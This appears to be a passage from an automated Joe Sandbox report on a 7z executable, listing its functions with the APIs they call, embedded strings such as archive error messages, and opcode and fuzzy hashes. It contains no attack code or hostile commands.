                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionThrow$freemallocmemmove
                                                                                                                                                                                                • String ID: Unsupported switch postfix -stm
                                                                                                                                                                                                • API String ID: 3321538808-3553869907
                                                                                                                                                                                                • Opcode ID: 3ba05a05aa46c940f23773d9ce02a237b61b661c07e43798567cd67be696040c
                                                                                                                                                                                                • Instruction ID: 0f95af4bddfbdd01db80601293b271d88d95991ba086a109621349d215b2d702
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ba05a05aa46c940f23773d9ce02a237b61b661c07e43798567cd67be696040c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 23F0F67670128586DB389F46E49076DA361F7C57D4F54C060EB8907B11CE39D4C6CB01
                                                                                                                                                                                                Function 00942A9C Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 00942AFD
                                                                                                                                                                                                  • Part of subcall function 00942130: malloc.MSVCRT ref: 00942134
                                                                                                                                                                                                  • Part of subcall function 00942130: _CxxThrowException.MSVCRT ref: 0094214F
                                                                                                                                                                                                • memmove.MSVCRT ref: 00942ACE
                                                                                                                                                                                                • free.MSVCRT ref: 00942AD6
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionThrow$freemallocmemmove
                                                                                                                                                                                                • String ID: (LP-
                                                                                                                                                                                                • API String ID: 3321538808-3833670221
                                                                                                                                                                                                • Opcode ID: dee4ccff2bc834ea296647a4ce6a28e4725f2e66e5f6a145a280ef756b46b2c7
                                                                                                                                                                                                • Instruction ID: 76cc85f64076fee093db245aa9ec7b735f04ede0047b7d38b0a764a8e181b45c
                                                                                                                                                                                                • Opcode Fuzzy Hash: dee4ccff2bc834ea296647a4ce6a28e4725f2e66e5f6a145a280ef756b46b2c7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 64F0907670124586DA28EF4AE890A5DB361F7C97D4F64C025EF8907754DE39D886CB04
                                                                                                                                                                                                Function 0098BF24 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$fputcfree
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3819637083-0
                                                                                                                                                                                                • Opcode ID: eae9d0b3d4822125a0af48fe465b7a3762b83d2397cc5a4e6371e8094d4e32a9
                                                                                                                                                                                                • Instruction ID: 33672061d8932debccfbbdbf7ef84b90f79a58699b75f7ce0a531368e25fefb4
                                                                                                                                                                                                • Opcode Fuzzy Hash: eae9d0b3d4822125a0af48fe465b7a3762b83d2397cc5a4e6371e8094d4e32a9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 87F0F46630494081DA21EF26E85475A6321BBDABF4F449322EEAE077A5DE28C5458704
                                                                                                                                                                                                Function 00983E08 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 33COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memmove.MSVCRT ref: 00983E51
                                                                                                                                                                                                  • Part of subcall function 00982B60: CompareFileTime.KERNEL32(?,?,?,00000000,00983E64), ref: 00982BA5
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CompareFileTimememmove
                                                                                                                                                                                                • String ID: alternate streams$files$streams
                                                                                                                                                                                                • API String ID: 1303509325-806849385
                                                                                                                                                                                                • Opcode ID: be883e452b7650b9078f8113c3e616bbeedde65b08412c4df6c6f1594ccd81f0
                                                                                                                                                                                                • Instruction ID: 39f9dc02202db2577b287caba01027f599ae7569bb2564e76e0d4e2e7e910628
                                                                                                                                                                                                • Opcode Fuzzy Hash: be883e452b7650b9078f8113c3e616bbeedde65b08412c4df6c6f1594ccd81f0
                                                                                                                                                                                                • Instruction Fuzzy Hash: F8F0625231056962EB25FB2AD505BD96321FB95FC4FC09012AE4C07F959F38C39AC700
                                                                                                                                                                                                Function 00946618 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FormatMessageW.KERNEL32 ref: 00946676
                                                                                                                                                                                                  • Part of subcall function 0094339C: free.MSVCRT ref: 009433D7
                                                                                                                                                                                                  • Part of subcall function 0094339C: memmove.MSVCRT(00000000,?,?,00000000,009410A8), ref: 009433F2
                                                                                                                                                                                                • LocalFree.KERNEL32 ref: 00946698
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FormatFreeLocalMessagefreememmove
                                                                                                                                                                                                • String ID: Error #
                                                                                                                                                                                                • API String ID: 2451246624-1299485822
                                                                                                                                                                                                • Opcode ID: 99fd73fc856dad1e88b4ccb444db1a8165f30a332f2d2e9cd02aa09722ea5f5f
                                                                                                                                                                                                • Instruction ID: e68780f497c373fe30385dce198ca225a412fbf8557357e45c6072c21df9510e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 99fd73fc856dad1e88b4ccb444db1a8165f30a332f2d2e9cd02aa09722ea5f5f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F21667222438096CB20CF25E040B9D73B5F7C6BA8F848226DB8847795DF7CC588CB11
                                                                                                                                                                                                Function 009449A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: UNC
                                                                                                                                                                                                • API String ID: 0-337201128
                                                                                                                                                                                                • Opcode ID: caa09ef79893b1e0c723e2139b0e345877b12b567cf7e66d5e2a6cc5cce0967e
                                                                                                                                                                                                • Instruction ID: 4f2bf94dbb2568aebd4c226437b0e8258a0b33142ed141dc11f8b43846cf1765
                                                                                                                                                                                                • Opcode Fuzzy Hash: caa09ef79893b1e0c723e2139b0e345877b12b567cf7e66d5e2a6cc5cce0967e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 76216A76340A49C6EF24CB5AD490F686368E789F88F14A027DF4947721EF39CC99D701
                                                                                                                                                                                                Function 009805F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • fputs.MSVCRT ref: 00980661
                                                                                                                                                                                                • free.MSVCRT ref: 00980680
                                                                                                                                                                                                  • Part of subcall function 0098B1C8: memset.MSVCRT ref: 0098B20D
                                                                                                                                                                                                  • Part of subcall function 0098B1C8: fputs.MSVCRT ref: 0098B232
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$freememset
                                                                                                                                                                                                • String ID: ERROR:
                                                                                                                                                                                                • API String ID: 2276422817-977468659
                                                                                                                                                                                                • Opcode ID: 0a7d431d3d93fe7a35051c5d28ee4a1495dab2c659ca31c2bdbd5e7bd3781aa1
                                                                                                                                                                                                • Instruction ID: cb5e55699f1980fb9212502112fe9f0c8cb204b527f8c70813c7a825c6a32927
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a7d431d3d93fe7a35051c5d28ee4a1495dab2c659ca31c2bdbd5e7bd3781aa1
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B118252301A4441CA24FF26E955B6E6320BBC5BE8F884625BE6F4B795DF2CC485C340
                                                                                                                                                                                                Function 0094B45C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60registryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0094B4AA
                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0094B4F8
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: QueryValue
                                                                                                                                                                                                • String ID: Path64
                                                                                                                                                                                                • API String ID: 3660427363-321863482
                                                                                                                                                                                                • Opcode ID: ce2d8586953f7850c663cd00a09a8bd9eb970d832503358bfea85760a13bb2cd
                                                                                                                                                                                                • Instruction ID: 57fe00c8bbe23dfe635cd2c9509c3be4a8a3bee97911680aeffeed600c5a126c
                                                                                                                                                                                                • Opcode Fuzzy Hash: ce2d8586953f7850c663cd00a09a8bd9eb970d832503358bfea85760a13bb2cd
                                                                                                                                                                                                • Instruction Fuzzy Hash: 79214C73615640C7EB14CF25E454B2EB7A4F794B84F60912AEB8907BA8DB3CC885CF40
                                                                                                                                                                                                Function 0098427C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Can not open encrypted archive. Wrong password?, xrefs: 00984297
                                                                                                                                                                                                • Can not open the file as archive, xrefs: 009842D8
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs
                                                                                                                                                                                                • String ID: Can not open encrypted archive. Wrong password?$Can not open the file as archive
                                                                                                                                                                                                • API String ID: 1795875747-2399861261
                                                                                                                                                                                                • Opcode ID: f39ddb69ac3a88cb739d838ad3232ca34d4044717459bc95227d5b49b5a19886
                                                                                                                                                                                                • Instruction ID: 11b7ba8943a464942b0880bdd79d0aacef9a1357081fd3c7ae233f5d6d778646
                                                                                                                                                                                                • Opcode Fuzzy Hash: f39ddb69ac3a88cb739d838ad3232ca34d4044717459bc95227d5b49b5a19886
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0701ADA232064692EF14FF2AE85075E2321BB85FC8F98A032EE0A47345DE3CC895C300
                                                                                                                                                                                                Function 009493D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: wcscmp
                                                                                                                                                                                                • String ID: \??\
                                                                                                                                                                                                • API String ID: 3392835482-3047946824
                                                                                                                                                                                                • Opcode ID: 877544d1592a68484731fd63782ff1f2adae2ffaa1fbb9196b429caabd26276c
                                                                                                                                                                                                • Instruction ID: e3925059cc78bd6ca4ad5bc7431c63ae21be09fa80812ccf58eabb618108a12d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 877544d1592a68484731fd63782ff1f2adae2ffaa1fbb9196b429caabd26276c
                                                                                                                                                                                                • Instruction Fuzzy Hash: F7F0906230095497CE149B2AD9A072D1321FB85BD9F90A832CB4A47B25DF24C4FBC310
                                                                                                                                                                                                Function 00981FE8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • fputs.MSVCRT ref: 00982011
                                                                                                                                                                                                  • Part of subcall function 00942300: fputc.MSVCRT ref: 00942311
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputcfputs
                                                                                                                                                                                                • String ID: Scan$Scanning
                                                                                                                                                                                                • API String ID: 269475090-1436252306
                                                                                                                                                                                                • Opcode ID: a333a3b1a96c340ffed71d634d5d0848bf1607734463fe365d44e1a31faf7854
                                                                                                                                                                                                • Instruction ID: 61eeb8288d9577310332fe288ef908e6aea79ba6623d5e81abeecd8ffdc43a2b
                                                                                                                                                                                                • Opcode Fuzzy Hash: a333a3b1a96c340ffed71d634d5d0848bf1607734463fe365d44e1a31faf7854
                                                                                                                                                                                                • Instruction Fuzzy Hash: DEF0E97230154191DF01EF38C9497AC2360E741F88F888136DB0D4B3A5DF28C5C6C310
                                                                                                                                                                                                Function 0094AFA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocExceptionStringThrow
                                                                                                                                                                                                • String ID: out of memory
                                                                                                                                                                                                • API String ID: 3773818493-2599737071
                                                                                                                                                                                                • Opcode ID: ce28fcea7ee96d73b8b783164c7ae5dc4e7789fb7bb4cf3f4b3e7c6f29d84c20
                                                                                                                                                                                                • Instruction ID: 783f194c8eeb291eee1b493b5b2020d8bc50e9e8fe20fb684a245af81964e25f
                                                                                                                                                                                                • Opcode Fuzzy Hash: ce28fcea7ee96d73b8b783164c7ae5dc4e7789fb7bb4cf3f4b3e7c6f29d84c20
                                                                                                                                                                                                • Instruction Fuzzy Hash: 49F0A062301B8592CB04DF11E99470C73B0FB8A784F64D021DB5C07B24EF78C8A9C301
                                                                                                                                                                                                Function 0098B7C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • fputs.MSVCRT ref: 0098B7E4
                                                                                                                                                                                                  • Part of subcall function 00942300: fputc.MSVCRT ref: 00942311
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputcfputs
                                                                                                                                                                                                • String ID: Scan $Scanning the drive:
                                                                                                                                                                                                • API String ID: 269475090-1085461122
                                                                                                                                                                                                • Opcode ID: a2747e59b778fe73a74f06889e3ba295ca3352f4c342e3460064b847c51e33a6
                                                                                                                                                                                                • Instruction ID: c92f4302b1c078ac9f5b79ba52f491880514731c3081c0fc3a559c58026c4e13
                                                                                                                                                                                                • Opcode Fuzzy Hash: a2747e59b778fe73a74f06889e3ba295ca3352f4c342e3460064b847c51e33a6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 73E0866631194281DE01DF29DA9579C5331AB85BE9F949422AE0D47725EF18C5DAC300
                                                                                                                                                                                                Function 0096EC5C Relevance: 5.3, APIs: 4, Instructions: 261COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • free.MSVCRT ref: 0096ECEE
                                                                                                                                                                                                • free.MSVCRT ref: 0096ECF6
                                                                                                                                                                                                • free.MSVCRT ref: 0096EFE3
                                                                                                                                                                                                • free.MSVCRT ref: 0096EFEB
                                                                                                                                                                                                  • Part of subcall function 00944D78: free.MSVCRT ref: 00944DBC
                                                                                                                                                                                                  • Part of subcall function 00944D78: free.MSVCRT ref: 00944DC4
                                                                                                                                                                                                  • Part of subcall function 00944D78: free.MSVCRT ref: 00944EAC
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 2568c4c8a93fed0a7db5756fe4b5abc77c557bdbfdb6e41abb2639136c3796b8
                                                                                                                                                                                                • Instruction ID: 9624bd2d692f4dbf01eb33518067b99b4ed1843d5f1b53e06f84140949fea913
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2568c4c8a93fed0a7db5756fe4b5abc77c557bdbfdb6e41abb2639136c3796b8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 48A1CD3B314B8197CB21DF26D5847AE7764F798B80F448126EF9A477A5EB3AC894C700
                                                                                                                                                                                                Function 009459E0 Relevance: 5.1, APIs: 4, Instructions: 117COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                • Opcode ID: 690fc6323045f1499638e60008430e199e5b92b8d4d6359a2f546a67527e5006
                                                                                                                                                                                                • Instruction ID: ea77d9ee3c3b65547485c9750db9b036c8c6bf20c500fff945c748269e178803
                                                                                                                                                                                                • Opcode Fuzzy Hash: 690fc6323045f1499638e60008430e199e5b92b8d4d6359a2f546a67527e5006
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6341D933204E8097CB20EF62E49092EB765F7C5FE4B554211EB5A1776ADF38C896C701
                                                                                                                                                                                                Function 009725DC Relevance: 5.1, APIs: 4, Instructions: 100COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
